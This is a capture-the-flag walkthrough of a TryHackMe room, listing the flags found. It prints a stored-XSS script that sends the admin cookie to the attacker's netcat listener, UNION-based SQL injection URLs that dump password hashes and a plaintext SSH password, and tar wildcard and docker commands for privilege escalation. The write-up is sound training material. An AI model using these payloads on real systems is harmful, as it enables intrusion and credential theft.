# The Marketplace

--------------------------------------------------------------------

## GIVEN INFO


**IP Address**: 10.10.171.25

--------------------------------------------------------------------

## PROCEDURE

### 1. FIND FLAG 1

```
nmap -A -T4 -p- -oN nmap.txt 10.10.171.25
```

**EXPOSED PORT (SERVICE)**:<br>

22 (ssh),

80 (http),

32768 (http)

```
gobuster dir -u http://10.10.171.25 -w /usr/share/dirb/wordlists/common.txt
```

Interesting: /robots.txt, /new, /admin, /messages, /signup

Each post has a report button which will trigger an admin to visit the post

The description input box is vulnerable to XSS so we can put our own script in their to steal the admin cookie

```html
<script>
    var i = new Image;
    i.src = "http://10.6.1.136:4444/?" + document.cookie
</script>
```

Now we can start our listener and then report the post

```bash
nc -lnvp 4444
```

Now that we have the admin cookie, we can use the cookie manager extension to use this cookie (token=COOKIE)

**FLAG 1**: THM{c37a63895910e478f28669b048c348d5}

### 2. FIND FLAG 2

When we click on each user, this is the parameter that shows up

```text
http://10.10.171.25/admin/?user=
```

This parameter is vulnerable to SQL injection because the following input gives us a SQL error

```text
http://10.10.171.25/admin/?user='
```

Now we can try and enumerate the SQL database

In order to do a union attack we first need to determine the number of columns

```text
omz_urlencode "0 UNION SELECT NULL"
http://10.10.171.25/admin/?user=0+UNION+SELECT+NULL
http://10.10.171.25/admin/?user=0+UNION+SELECT+NULL,NULL
http://10.10.171.25/admin/?user=0+UNION+SELECT+NULL,NULL,NULL
http://10.10.171.25/admin/?user=0+UNION+SELECT+NULL,NULL,NULL,NULL
```

This database has 4 columns so now we can get more information\

```text
omz_urlencode "0 UNION SELECT database(),NULL,NULL,NULL FROM information_schema.tables"

http://10.10.171.25/admin/?user=0+UNION+SELECT+database(),NULL,NULL,NULL+FROM+information_schema.tables # Identify database
http://10.10.171.25/admin/?user=0+UNION+SELECT+GROUP_CONCAT(table_name),NULL,NULL,NULL+FROM+information_schema.tables+WHERE+table_schema="marketplace" # Identify tables
http://10.10.171.25/admin/?user=0+UNION+SELECT+GROUP_CONCAT(column_name),NULL,NULL,NULL+FROM+information_schema.columns+WHERE+table_name="users" # Identify columns in User table
http://10.10.171.25/admin/?user=0+UNION+SELECT+GROUP_CONCAT(username,password),NULL,NULL,NULL+FROM+users # Found password hashes for all users

http://10.10.171.25/admin/?user=0+UNION+SELECT+GROUP_CONCAT(column_name),NULL,NULL,NULL+FROM+information_schema.columns+WHERE+table_name="messages" # Jake's SSH password in plaintext
```

**SSH PASSWORD**: @b_ENXkGYUCAv3zJ

**FLAG 2**: THM{c3648ee7af1369676e3e4b15da6dc0b4}

### 3. FIND FLAG 3

```bash
sudo -l
```

Jake can run /opt/backups/backup.sh as Michael without a password

backup.sh uses a wildcard with the tar program which we can exploit.

Wildcard means that if we have a file name "-la" and we use the "ls *" command with a wildcard then it will interpret that file as a command flag "ls -la"

In order to stop this behavior we can pass the "--" flag to the program in order for it to stop processing further flags so "ls -- *" would just list the files

From [GTFOBins](https://gtfobins.github.io/gtfobins/tar/#sudo)

```bash
cd /opt/backups/
echo "/bin/bash" > shell.sh
touch -- "--checkpoint=1"
touch -- "--checkpoint-action=exec=sh shell.sh"
sudo -u michael /opt/backups/backup.sh
```

Running linpeas we see that Michael is a part of the docker group

From [GTFOBins](https://gtfobins.github.io/gtfobins/docker/#shell)

```bash
docker run -v /:/mnt --rm -it alpine chroot /mnt sh
```

**FLAG 3**: THM{d4f76179c80c0dcf46e0f843c9abd62}
